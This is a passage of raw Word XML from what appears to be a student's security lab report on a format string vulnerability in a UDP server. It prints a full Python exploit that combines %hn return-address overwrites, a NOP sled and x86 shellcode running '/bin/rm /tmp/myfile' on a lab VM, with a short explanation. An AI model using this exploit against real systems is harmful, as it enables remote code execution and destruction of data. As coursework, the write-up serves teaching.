            <wp:docPr id="18" name="Picture 18" descr="../../../../Desktop/Screen%20Shot%202018-10-20%20at%204.5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10-20%20at%204.57.1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4550" cy="1518920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DADBC18" w14:textId="7F9B113C" w:rsidR="006F3E6B" w:rsidRDefault="0014440E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot5</w:t>
      </w:r>
      <w:r w:rsidR="006F3E6B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, if we run the server program again. And we also send the message again. This time because the /tmp/myfile does not exist, so it shows message “no such file or directory”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D5EE01" w14:textId="77777777" w:rsidR="00D14E36" w:rsidRDefault="00D14E36">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2A98EF" w14:textId="77777777" w:rsidR="00665A29" w:rsidRDefault="00665A29">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62185083" w14:textId="72BFB0B2" w:rsidR="00D14E36" w:rsidRPr="00D14E36" w:rsidRDefault="00D14E36">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D14E36">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation and Explanation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77209550" w14:textId="775F7995" w:rsidR="00323D8A" w:rsidRDefault="00D14E36">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003D290D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>In this task, we want to inject malicious code to the server by the format string vulnerability. And the malicious code is “/bin/rm /tmp/myfile”</w:t>
      </w:r>
      <w:r w:rsidR="00323D8A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. After this command executed, the /tmp/myfile on the server will be removed. So first we need to create such file on the </w:t>
      </w:r>
      <w:r w:rsidR="00323D8A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">server (screenshot1). Then we run the server program on the server VM. To perform the attack in this task, we write a python </w:t>
      </w:r>
      <w:r w:rsidR="004E0E25">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>program</w:t>
      </w:r>
      <w:r w:rsidR="00323D8A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561E90F1" w14:textId="77777777" w:rsidR="00DA1A82" w:rsidRDefault="00DA1A82" w:rsidP="00DA1A82">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#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215A1023"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import struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1729D96C"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import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B86BB62"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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACF6C74"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42806D6A"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def send_to_server(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F25C17"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host = "10.0.2.5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C3BD5E"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port = 9090                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57447EE9"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s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5A096"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s.connect((host, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAE8292"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s.sendall(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD3DA0E"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s.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C611BB5"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4470D9AD"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shellcode= (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BA368"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 Push '/bin////bash' into stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E98934A"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"\x31\xc0"                              # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5754CD"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"\x50"                                  # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675D0AEC"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"\x68""bash"                            # pushl "bash"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7778E064"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"\x68""////"                            # pushl "////"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7345424D"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"\x68""/bin"                            # pushl "/bin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D8C6B"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"\x89\xe3"                              # movl %esp, %ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D0B5DE"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56DDED0C"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 Push '-ccc' into stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADBD8AD"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"\x31\xc0"                              # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F142D3A"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"\x50"                                  # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4417F5BE"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"\x68""-ccc"                            # pushl "-ccc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663B549C"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"\x89\xe0"                              # movl %esp, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D29D5AB"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18F6B14D"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"\x31\xd2"</w:t>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    # xorl %edx,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFCA8F2"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"\x52"</w:t>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        # pushl %edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EA1AD0"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"\x68""ile "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051381AC"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"\x68""/myf"</w:t>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58624A5F"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"\x68""/tmp"</w:t>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCC02C4"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"\x68""/rm "</w:t>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    # pushl "////"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2692F465"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"\x68""/bin"</w:t>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    # pushl "/CTF"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB67C56"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"\x89\xe2"</w:t>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    # movl %esp,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CCF18A"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765B3689"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 Construct the argv[] array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24482C31"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"\x31\xc9"                              # xorl %ecx,%ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD4288B"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"\x51"                                  # pushl %ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0924470C"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"\x52"                                  # pushl %edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC65639"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"\x50"                                  # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E6B1C3"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"\x53"                                  # pushl %ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E2C47"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"\x89\xe1"                              # movl %esp,%ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B358099"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4E93617F"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 Set edx to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07101EFB"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"\x31\xd2"                              # xorl %edx,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10812E7F"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46E1712A"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 Invoke the system call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BF267B"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"\x31\xc0"                              # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D342ECD"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"\xb0\x0b"                              # movb $0x0b,%al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F43A73"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"\xcd\x80"                              # int $0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45732EA9"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lastRenderedPageBreak/>
        <w:t>).encode('latin-1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4796889E"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7503FB5F"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 Construct the argv[] array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CF73E2"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"\x31\xc9"              # xorl %ecx,%ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159D6F0F"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"\x51"                  # pushl %ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BA50A4"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"\x52"                  # pushl %edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB47447"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"\x50"                  # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDD9351"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"\x53"                  # pushl %ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15698E3A"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"\x89\xe1"              # movl %esp,%ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D820E08"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5160FCE8"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 Set edx to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D32C5F"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"\x31\xd2"              # xorl %edx,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1059F50F"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661AEAEE"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 Invoke the system call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B3AC4A"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"\x31\xc0"              # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E56813"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"\xb0\x0b"                          # movb $0x0b,%al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD68EE5"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"\xcd\x80"                          # int $0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6534D9E8"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).encode('latin-1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379876B8"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6F0F37B9"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#address of shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D9ADF7"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buf_high_addr = 0xbfff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF3BD03"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73A70596" w14:textId="28258154"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buf_low_addr = 0xf0d0 + </w:t>
      </w:r>
      <w:r w:rsidR="00001A20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0xa4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698E421A"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118ACDF8"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#return address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150C5380" w14:textId="2FD66D89" w:rsidR="00323D8A" w:rsidRPr="00323D8A" w:rsidRDefault="000D3BE4" w:rsidP="00323D8A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00342D38">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eturn_addr = 0xbffff090 -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EC1604"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401559FD"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#put return address in the head of the format string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2A2424"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content = struct.pack("&lt;I", return_addr+2) + b'@@@@' + struct.pack("&lt;I", return_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B93BC5"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3A369B01"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#move the pointer to the buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE5562C"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for i in range(22):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0827BA8B"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content += b"%.8x."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C10D4"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708E86E7" w14:textId="2ADF233C"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#calculate and construct the </w:t>
      </w:r>
      <w:r w:rsidR="002D4869">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r w:rsidR="00A72EBE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DA4FB8"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firstPart = b'%.' + bytes(str(buf_high_addr - 22 * 8 - 12 - 22), encoding='ascii') + b'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20310CCE"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14C4EED7"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secondPart = b'%.' + bytes(str(buf_low_addr - buf_high_addr - 1), encoding='ascii') + b'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620B63D4"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6A019EEB"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#add shellcode address in the format string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A9495"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content = content + firstPart + b"%hn" + secondPart + b"%hn"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7162F197"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7BDB2969" w14:textId="7E4A7C24"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#add </w:t>
      </w:r>
      <w:r w:rsidR="00DF0BEF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> NOP between format string and shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D08F37" w14:textId="3AC65C9B"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for i in range(</w:t>
      </w:r>
      <w:r w:rsidR="00BD700F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59130460"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    content += b'\x90'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499BB715"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75CB8328"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#add shellcode in the end of the format string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B739044" w14:textId="13343E9F" w:rsid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 xml:space="preserve">content += </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3452746B" w14:textId="77777777" w:rsidR="00073522" w:rsidRDefault="00073522" w:rsidP="00323D8A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F5DEE2F" w14:textId="77777777" w:rsidR="00073522" w:rsidRDefault="00073522" w:rsidP="00323D8A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF23C95" w14:textId="1B0AFB78" w:rsidR="00073522" w:rsidRDefault="00073522" w:rsidP="00323D8A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#write the message to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798DBC02" w14:textId="77777777" w:rsidR="00073522" w:rsidRPr="00073522" w:rsidRDefault="00073522" w:rsidP="00073522">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073522">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>file = open("badfile", "wb")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D729C60" w14:textId="77777777" w:rsidR="00073522" w:rsidRPr="00073522" w:rsidRDefault="00073522" w:rsidP="00073522">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073522">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>file.write(content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A490CB4" w14:textId="40E5EE42" w:rsidR="00073522" w:rsidRPr="00323D8A" w:rsidRDefault="00073522" w:rsidP="00073522">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073522">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>file.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B72488F"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p>
    <w:p w14:paraId="2A567735"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#send the message to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5227FD40" w14:textId="77777777" w:rsidR="00323D8A" w:rsidRPr="00323D8A" w:rsidRDefault="00323D8A" w:rsidP="00323D8A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00323D8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>send_to_server(content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC1FD7" w14:textId="773FD7F5" w:rsidR="00323D8A" w:rsidRPr="00323D8A" w:rsidRDefault="00323D8A" w:rsidP="00323D8A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2B7436" w14:textId="4EE710E6" w:rsidR="00C679E4" w:rsidRDefault="002B0FFD">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00CC5DB5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">irst is the server part, we define a send_to_server() function, which will send our message to the sever VM. The next is the shellcode for remove file /tmp/myfile. The next part constructs the </w:t>
      </w:r>
      <w:r w:rsidR="00882862">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r w:rsidR="00685DFF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (format string)</w:t>
      </w:r>
